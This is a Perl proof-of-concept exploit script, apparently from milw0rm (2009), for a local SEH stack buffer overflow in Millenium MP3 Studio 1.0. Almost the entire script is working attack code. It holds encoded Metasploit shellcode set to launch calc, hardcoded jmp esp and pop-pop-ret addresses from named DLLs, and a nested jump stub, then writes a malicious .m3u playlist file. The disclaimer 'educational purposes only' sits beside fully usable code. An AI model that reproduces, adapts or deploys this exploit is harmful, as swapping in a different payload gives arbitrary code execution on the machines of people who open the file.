84 lines
No EOL
3.7 KiB
Perl
Executable file
84 lines
No EOL
3.7 KiB
Perl
Executable file
#
|
|
# [+] Vulnerability : (.mpf /.m3u File) Local Stack Overflow Exploit (SEH) #1
|
|
# [+] Product : Millenium MP3 Studio
|
|
# [+] Versions affected : v1.0
|
|
# [+] Download : http://www.software112.com/products/mp3-millennium+download.html
|
|
# [+] Method : <ret>/<seh>
|
|
# [+] Tested on : Windows XP SP3 En
|
|
# [+] Written by : corelanc0d3r (corelanc0d3r[at]gmail[dot]com
|
|
# [+] Greetz to : Saumil & SK :-)
|
|
# -----------------------------------------------------------------------------
|
|
# MMMMM~.
|
|
# MMMMM?.
|
|
# MMMMMM8. .=MMMMMMM.. MMMMMMMM, MMMMMMM8. MMMMM?. MMMMMMM: MMMMMMMMMM.
|
|
# MMMMMMMMMM=.MMMMMMMMMMM.MMMMMMMM=MMMMMMMMMM=.MMMMM?7MMMMMMMMMM: MMMMMMMMMMM:
|
|
# MMMMMIMMMMM+MMMMM$MMMMM=MMMMMD$I8MMMMMIMMMMM~MMMMM?MMMMMZMMMMMI.MMMMMZMMMMM:
|
|
# MMMMM==7III~MMMMM=MMMMM=MMMMM$. 8MMMMMZ$$$$$~MMMMM?..MMMMMMMMMI.MMMMM+MMMMM:
|
|
# MMMMM=. MMMMM=MMMMM=MMMMM7. 8MMMMM? . MMMMM?NMMMM8MMMMMI.MMMMM+MMMMM:
|
|
# MMMMM=MMMMM+MMMMM=MMMMM=MMMMM7. 8MMMMM?MMMMM:MMMMM?MMMMMIMMMMMO.MMMMM+MMMMM:
|
|
# =MMMMMMMMMZ~MMMMMMMMMM8~MMMMM7. .MMMMMMMMMMO:MMMMM?MMMMMMMMMMMMIMMMMM+MMMMM:
|
|
# .:$MMMMMO7:..+OMMMMMO$=.MMMMM7. ,IMMMMMMO$~ MMMMM?.?MMMOZMMMMZ~MMMMM+MMMMM:
|
|
# .,,,.. .,,,,. .,,,,, ..,,,.. .,,,,.. .,,...,,,. .,,,,..,,,,.
|
|
# eip hunters
|
|
# -----------------------------------------------------------------------------
|
|
#
|
|
# Script provided for educational purposes only.
|
|
#
|
|
#
|
|
#
|
|
my $junk = "http://";
|
|
#$junk=$junk."\xcc";
|
|
# real shellcode, will be put at ebp-1027
|
|
# windows/exec - 303 bytes
|
|
# http://www.metasploit.com
|
|
# Encoder: x86/alpha_upper
|
|
# EXITFUNC=seh, CMD=calc
|
|
my $shellcode2="\x89\xe6\xda\xdb\xd9\x76\xf4\x58\x50\x59\x49\x49\x49\x49" .
|
|
"\x43\x43\x43\x43\x43\x43\x51\x5a\x56\x54\x58\x33\x30\x56" .
|
|
"\x58\x34\x41\x50\x30\x41\x33\x48\x48\x30\x41\x30\x30\x41" .
|
|
"\x42\x41\x41\x42\x54\x41\x41\x51\x32\x41\x42\x32\x42\x42" .
|
|
"\x30\x42\x42\x58\x50\x38\x41\x43\x4a\x4a\x49\x4b\x4c\x4b" .
|
|
"\x58\x50\x44\x45\x50\x43\x30\x43\x30\x4c\x4b\x51\x55\x47" .
|
|
"\x4c\x4c\x4b\x43\x4c\x45\x55\x43\x48\x45\x51\x4a\x4f\x4c" .
|
|
"\x4b\x50\x4f\x45\x48\x4c\x4b\x51\x4f\x47\x50\x45\x51\x4a" .
|
|
"\x4b\x51\x59\x4c\x4b\x50\x34\x4c\x4b\x45\x51\x4a\x4e\x50" .
|
|
"\x31\x49\x50\x4d\x49\x4e\x4c\x4c\x44\x49\x50\x42\x54\x43" .
|
|
"\x37\x49\x51\x49\x5a\x44\x4d\x43\x31\x48\x42\x4a\x4b\x4b" .
|
|
"\x44\x47\x4b\x51\x44\x47\x54\x45\x54\x42\x55\x4b\x55\x4c" .
|
|
"\x4b\x51\x4f\x46\x44\x43\x31\x4a\x4b\x42\x46\x4c\x4b\x44" .
|
|
"\x4c\x50\x4b\x4c\x4b\x51\x4f\x45\x4c\x43\x31\x4a\x4b\x4c" .
|
|
"\x4b\x45\x4c\x4c\x4b\x45\x51\x4a\x4b\x4d\x59\x51\x4c\x51" .
|
|
"\x34\x45\x54\x48\x43\x51\x4f\x50\x31\x4a\x56\x43\x50\x51" .
|
|
"\x46\x45\x34\x4c\x4b\x47\x36\x46\x50\x4c\x4b\x47\x30\x44" .
|
|
"\x4c\x4c\x4b\x44\x30\x45\x4c\x4e\x4d\x4c\x4b\x43\x58\x45" .
|
|
"\x58\x4b\x39\x4b\x48\x4b\x33\x49\x50\x43\x5a\x46\x30\x42" .
|
|
"\x48\x4a\x50\x4c\x4a\x44\x44\x51\x4f\x42\x48\x4a\x38\x4b" .
|
|
"\x4e\x4d\x5a\x44\x4e\x51\x47\x4b\x4f\x4a\x47\x42\x43\x45" .
|
|
"\x31\x42\x4c\x45\x33\x45\x50\x41\x41";
|
|
$junk = $junk.$shellcode2."A" x (4099-length($shellcode2));
|
|
|
|
my $ret= pack('V',0x770CA3E7); #eip, jmp esp from comres.dll
|
|
my $nseh = "\xeb\x06\x90\x90"; #jump 6
|
|
my $seh = pack('V',0x1001FF41); #pop pop ret from xaudio.dll
|
|
|
|
#jumpcode
|
|
my $shellcode="\xe9\xf4\xef\xff\xff"; #jump to 0x00124d55 (ebp-1027) #hardcoded, sorry... not enough time
|
|
# If address is different on your system, then change the jumpcode.
|
|
# You have 20 bytes at your disposal (to jump to ebp-1027 :-) )
|
|
$shellcode=$shellcode."A"x15;
|
|
#
|
|
#
|
|
my $rest="\x00" x 10;
|
|
#
|
|
#
|
|
print "[+] Writing exploit file c0d3rsploit.m3u\n";
|
|
open (myfile,">c0d3rsploit.m3u");
|
|
print myfile $junk.$ret.$shellcode.$rest;
|
|
close (myfile);
|
|
print "[+] File written\n";
|
|
|
|
|
|
#
|
|
#
|
|
|
|
# milw0rm.com [2009-07-28] |